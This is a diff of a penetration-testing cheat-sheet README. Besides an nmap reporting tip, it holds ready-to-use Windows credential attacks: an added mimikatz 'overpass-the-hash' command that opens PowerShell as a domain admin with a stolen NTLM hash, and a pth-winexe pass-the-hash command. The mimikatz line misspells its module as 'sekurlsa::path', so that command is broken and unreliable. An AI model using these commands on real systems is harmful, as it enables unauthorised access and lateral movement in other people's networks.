encryptedninja/command-center/README.md

 If you need to generate a nice html report from the output you can use *_xsltproc_*:

 * `sudo xsltproc final_discovery.xml -o nmap_DATE_TARGET.html`

+## overpass-the-hash

+* get the bill_admin's hash then use it to open up a new PowerShell prompt as him with mimikatz: `sekurlsa::path /user:bill_admin /domain:corp.com /ntlm:<NTLM hash> /run:PowerShell.exe`

 ## pass-the-hash
 * pass-the-hash attack for Win: `pth-winexe -U Administrator%'<admin hash>' //<target IP> cmd.exe`